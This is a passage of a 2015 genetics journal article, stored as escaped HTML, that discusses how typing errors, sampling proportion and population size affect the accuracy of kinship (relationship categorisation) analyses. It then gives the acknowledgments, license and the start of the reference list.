genotype may be incorrect in 3.5% of individuals, as a recent study has shown (\u003Ca id=\u0022xref-ref-17-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-17\u0022\u003EGreminger \u003Cem\u003Eet al.\u003C\/em\u003E 2014\u003C\/a\u003E). Typing error should be taken into account because it can have profound effects on the power of kinship analyses. For most categories, with a 2% typing error rate, the number of loci required for any given correct classification rate of RCA is two to four times greater compared with error-free data (question 9 in \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS5.pdf\u0022\u003ETable S5\u003C\/a\u003E, \u003Ca id=\u0022xref-table-wrap-1-5\u0022 class=\u0022xref-table\u0022 href=\u0022#T1\u0022\u003ETable 1\u003C\/a\u003E, and \u003Ca id=\u0022xref-table-wrap-2-12\u0022 class=\u0022xref-table\u0022 href=\u0022#T2\u0022\u003ETable 2\u003C\/a\u003E). PO and FS dyads are logically more susceptible to error than dyads of more distantly related categories; our data corroborate this (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS5.pdf\u0022\u003ETable S5\u003C\/a\u003E and \u003Ca id=\u0022xref-table-wrap-2-13\u0022 class=\u0022xref-table\u0022 href=\u0022#T2\u0022\u003ETable 2\u003C\/a\u003E). Taking the ideal data sets generated by simulations into account, the number of loci we recommend to be used for RCAs are the minimum for best case data sets, meaning that researchers should estimate the error rate of their data and its impact on analyses. Also, it is important to bear in mind (and this is one aim of this study) that the necessary number of loci for an RCA to be able to have an adequate correct classification rate might differ for populations with other characteristics not present in the simulated populations.\u003C\/p\u003E\u003Cp id=\u0022p-46\u0022\u003EThe decline in correct classification rate with increasing proportion of individuals sampled in the population (question 6 in \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS4.pdf\u0022\u003EFigure S4\u003C\/a\u003E and \u003Ca id=\u0022xref-table-wrap-1-6\u0022 class=\u0022xref-table\u0022 href=\u0022#T1\u0022\u003ETable 1\u003C\/a\u003E) may be puzzling at first. Here it is important to note that the number of dyads increases as the square of the number of individuals sampled, with a faster increase of the number of unrelated dyads compared to related dyads (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS5.pdf\u0022\u003EFigure S5\u003C\/a\u003E, \u003Ca id=\u0022xref-ref-39-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-39\u0022\u003ESkaug \u003Cem\u003Eet al.\u003C\/em\u003E 2010\u003C\/a\u003E). It seems that the influence of misclassifying unrelated individuals outweighs any correct classification rate gain due to improved estimates of allele frequencies (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS6.pdf\u0022\u003EFigure S6\u003C\/a\u003E) due to more complete sampling.\u003C\/p\u003E\u003Cp id=\u0022p-47\u0022\u003ECensus population size is a parameter space that we did not explore, even though it might influence the correct classification rate of an RCA. Some effects may be inferred from the subsampling simulations: the correct classification rate of the RCA decreased with increasing number of pedigree-based unrelated dyads. This finding suggests that in comparison with small populations, relationship assignments of samples originating from large populations potentially may require more loci for similar correct classification rate and\/or certain categories may not reach satisfactory correct classification rates.\u003C\/p\u003E\u003Cp id=\u0022p-48\u0022\u003EWe would like to emphasize that, especially with the facilitated development of genetic markers, (i) the effect of intrinsic population characteristics on correct classification rate should be taken into account for RCAs, and (ii) 95% correct classification rate can be achieved and should be favored over the 80% threshold that is widely used in paternity studies (\u003Ca id=\u0022xref-ref-29-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-29\u0022\u003EMarshall \u003Cem\u003Eet al.\u003C\/em\u003E 1998\u003C\/a\u003E). Also, the correct classification rate of a set of loci should be evaluated at the beginning of a project and considered in downstream analyses and interpretation. Unfortunately, sorely-needed software simulating populations that have realistic population parameters and track pedigrees through time are very rare, making RCA power analyses difficult. Instead, available simulation software uses simple demographic and life history models (\u003Ca id=\u0022xref-ref-20-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-20\u0022\u003EHoban 2014\u003C\/a\u003E) or researchers use custom-made simulations (this study, \u003Ca id=\u0022xref-ref-41-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-41\u0022\u003ETaylor \u003Cem\u003Eet al.\u003C\/em\u003E 2015\u003C\/a\u003E). Until software that simulates populations with realistic parameters are available, the relationship between correct classification rate, population characteristics, and genetic marker characteristics suggested in this study could be used as a rough guideline for power estimates.\u003C\/p\u003E\u003C\/div\u003E\u003Cdiv class=\u0022section ack\u0022 id=\u0022ack-1\u0022\u003E\u003Ch2 class=\u0022\u0022\u003EAcknowledgments\u003C\/h2\u003E\u003Cp id=\u0022p-49\u0022\u003EWe are grateful to Bob Dr\u00f6ge from the Millipede team for his advice on running the simulations on a HPC cluster and to Jo\u00e3o B. L. Gusm\u00e3o Junior for improving the resolution of \u003Ca id=\u0022xref-fig-1-9\u0022 class=\u0022xref-fig\u0022 href=\u0022#F1\u0022\u003EFigure 1\u003C\/a\u003E. We would like to thank two anonymous reviewers for their helpful comments. A.M.K. was supported by a fellowship for prospective researchers from the Swiss National Science Foundation. \u003C\/p\u003E\u003C\/div\u003E\u003Cdiv class=\u0022section fn-group\u0022 id=\u0022fn-group-1\u0022\u003E\u003Ch2\u003EFootnotes\u003C\/h2\u003E\u003Cul\u003E\u003Cli class=\u0022fn-supplementary-material\u0022 id=\u0022fn-6\u0022\u003E\u003Cp id=\u0022p-50\u0022\u003ESupporting information is available online at \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\u0022\u003Ewww.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\u003C\/a\u003E\u003C\/p\u003E\u003C\/li\u003E\u003Cli class=\u0022fn\u0022 id=\u0022fn-7\u0022\u003E\u003Cp id=\u0022p-51\u0022\u003E\u003Cem\u003ECommunicating editor: S. I. Wright\u003C\/em\u003E\u003C\/p\u003E\u003C\/li\u003E\u003C\/ul\u003E\u003C\/div\u003E\u003Cul class=\u0022history-list\u0022\u003E\u003Cli xmlns:hwp=\u0022http:\/\/schema.highwire.org\/Journal\u0022 class=\u0022received\u0022 hwp:start=\u00222015-03-27\u0022\u003E\u003Cspan class=\u0022received-label\u0022\u003EReceived \u003C\/span\u003EMarch 27, 2015.\u003C\/li\u003E\u003Cli xmlns:hwp=\u0022http:\/\/schema.highwire.org\/Journal\u0022 class=\u0022accepted\u0022 hwp:start=\u00222015-06-23\u0022\u003E\u003Cspan class=\u0022accepted-label\u0022\u003EAccepted \u003C\/span\u003EJune 23, 2015.\u003C\/li\u003E\u003C\/ul\u003E\u003Cul class=\u0022copyright-statement\u0022\u003E\u003Cli class=\u0022fn\u0022 id=\u0022copyright-statement-1\u0022\u003ECopyright \u00a9 2015 Kopps \u003Cem\u003Eet al.\u003C\/em\u003E\u003C\/li\u003E\u003C\/ul\u003E\u003Cdiv class=\u0022license\u0022 id=\u0022license-1\u0022\u003E\u003Cp id=\u0022p-1\u0022\u003EThis is an open-access article distributed under the terms of the Creative Commons Attribution 4.0 International License (\u003Ca href=\u0022http:\/\/creativecommons.org\/licenses\/by\/4.0\/\u0022 rel=\u0022license\u0022\u003Ehttp:\/\/creativecommons.org\/licenses\/by\/4.0\/\u003C\/a\u003E), which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.\u003C\/p\u003E\u003C\/div\u003E\u003Cdiv class=\u0022section ref-list\u0022 id=\u0022ref-list-1\u0022\u003E\u003Ch2 class=\u0022\u0022\u003ELiterature Cited\u003C\/h2\u003E\u003Col class=\u0022cit-list ref-use-labels\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-1-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-1\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.1\u0022 data-doi=\u002210.1016\/j.forsciint.2004.06.018\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAmorim\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPereira\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EL.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2005\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EPros and cons in the use of SNPs in forensic kinship investigation: a comparative analysis with STRs.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EForensic Sci. Int.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E150\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E17\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E21\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DForensic%2BScience%2BInternational%26rft.stitle%253DForensic%2BScience%2BInternational%26rft.aulast%253DAmorim%26rft.auinit1%253DA.%26rft.volume%253D150%26rft.issue%253D1%26rft.spage%253D17%26rft.epage%253D21%26rft.atitle%253DPros%2Band%2Bcons%2Bin%2Bthe%2Buse%2Bof%2BSNPs%2Bin%2Bforensic%2Bkinship%2Binvestigation%253A%2Ba%2Bcomparative%2Banalysis%2Bwith%2BSTRs.%26rft_id%253Dinfo%253Adoi%252F10.1016%252Fj.forsciint.2004.06.018%26rft_id%253Dinfo%253Apmid%252F15837005%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1016\/j.forsciint.2004.06.018\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=15837005\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-2-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-2\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.2\u0022 data-doi=\u002210.1534\/genetics.105.048074\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAnderson\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EE.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EGarza\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2006\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EThe power of single-nucleotide polymorphisms for large-scale parentage inference.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EGenetics\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E172\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E2567\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E2582\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DGenetics%26rft_id%253Dinfo%253Adoi%252F10.1534%252Fgenetics.105.048074%26rft_id%253Dinfo%253Apmid%252F16387880%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6ODoiZ2VuZXRpY3MiO3M6NToicmVzaWQiO3M6MTA6IjE3Mi80LzI1NjciO3M6NDoiYXRvbSI7czoxODoiL2dnZy81LzkvMTgxNS5hdG9tIjt9czo4OiJmcmFnbWVudCI7czowOiIiO30=\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-3-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-3\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.3\u0022 data-doi=\u002210.2307\/3545516\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAvise\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. C.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E1992\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EMolecular population structure and the biogeographic history of a regional fauna: a case history with lessons for conservation biology.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EOikos\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E63\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E62\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E76\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DOikos%26rft.volume%253D63%26rft.spage%253D62%26rft_id%253Dinfo%253Adoi%252F10.2307%252F3545516%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.2307\/3545516\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=A1992HK90600008\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-4-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-4\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.4\u0022 data-doi=\u002210.1186\/1471-2148-14-68\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAykanat\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ET.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EJohnston\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ECotter\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ECross\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ET.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPoole\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ER.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EMolecular pedigree reconstruction and estimation of evolutionary parameters in a wild Atlantic salmon river system with incomplete sampling: a power analysis.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EBMC Evol. Biol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E14\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E68\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DBMC%2BEvol.%2BBiol.%26rft.volume%253D14%26rft.spage%253D68%26rft_id%253Dinfo%253Adoi%252F10.1186%252F1471-2148-14-68%26rft_id%253Dinfo%253Apmid%252F24684698%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1186\/1471-2148-14-68\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=24684698\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-5-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-5\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.5\u0022 data-doi=\u002210.1073\/pnas.1120666109\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBenjamin\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ECesarini\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003Evan der Loos\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM. J. H. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EDawes\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EC. T.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKoellinger\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EP. D.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2012\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EThe genetic architecture of economic and political preferences.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EProc. Natl. Acad. Sci. USA\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E109\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E8026\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E8031\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DProc.%2BNatl.%2BAcad.%2BSci.%2BUSA%26rft_id%253Dinfo%253Adoi%252F10.1073%252Fpnas.1120666109%26rft_id%253Dinfo%253Apmid%252F22566634%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6NDoicG5hcyI7czo1OiJyZXNpZCI7czoxMToiMTA5LzIxLzgwMjYiO3M6NDoiYXRvbSI7czoxODoiL2dnZy81LzkvMTgxNS5hdG9tIjt9czo4OiJmcmFnbWVudCI7czowOiIiO30=\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-6-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-6\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.6\u0022 data-doi=\u002210.1016\/S0169-5347(03)00225-8\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBlouin\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM. S.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2003\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EDNA-based methods for pedigree reconstruction and kinship analysis in natural populations.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003ETrends Ecol. Evol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E18\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E503\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E511\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DTrends%2BEcol.%2BEvol.%26rft.volume%253D18%26rft.spage%253D503%26rft_id%253Dinfo%253Adoi%252F10.1016%252FS0169-5347%252803%252900225-8%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1016\/S0169-5347(03)00225-8\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca 